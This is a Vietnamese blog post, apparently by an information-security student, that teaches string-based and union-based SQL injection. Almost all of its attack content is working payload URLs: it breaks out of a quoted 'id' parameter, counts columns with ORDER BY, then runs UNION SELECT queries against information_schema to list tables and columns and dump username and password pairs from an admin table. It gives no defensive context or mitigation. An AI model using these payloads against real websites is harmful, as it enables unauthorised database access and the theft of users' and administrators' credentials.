String based SQL Injection
6:03 PM
Add Comment
Thế nào là String based SQL Injection
Hôm nay mình sẽ giải thích sâu hơn khi khai thác lỗi SQL Injection .
Nói nôm na là khi ta thử truy vấn khai thác lỗi như order by, group by, having 1=2 ... nhưng kết quả trang web không có sự thay đổi, hoặc trang load bình thường.
http://site.com/index.php?id=10 order by 1000--
Giải pháp cho tình huống này
Code:
http://site.com/index.php?id=10' order by 1000--+
Chúng ta sử dụng các kí tự ' và + đằng sau câu truy vấn
Code:
id=X' order by--+
String-Union Based SQL injection
1. Xác định số column:
Code:
Code:
Code:
http://www.site.com/index.php?id=234' order by 11--+2. Get table_name:
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Giả sử table là admin
3.Get column:
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+
Chuyển mã hex table admin, admin=0x61646d696e. Giả sử column có được là username, password.
4.Get data
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
Tôi là Hữu Tuấn. Một sinh viên học An Toàn Thông Tin và đam mê công nghệ. Nếu bạn thấy bài viết này có ích thì hãy cho mình 1 chia sẻ nha!
0 Response to "String based SQL Injection"
Post a Comment
Nội Quy Khi Comment:
» Các bài comment phải nghiêm túc, không dung tục, không spam.
» Nội dung phải liên quan tới chủ đề bài viết.
» Những nhận xét spam sẽ bị xóa.
» Sử dụng tài khoản Google để được trợ giúp.
» Nặc danh thường không được chào đón.
Note : Hãy để lại nhận xét bên dưới bạn nhé !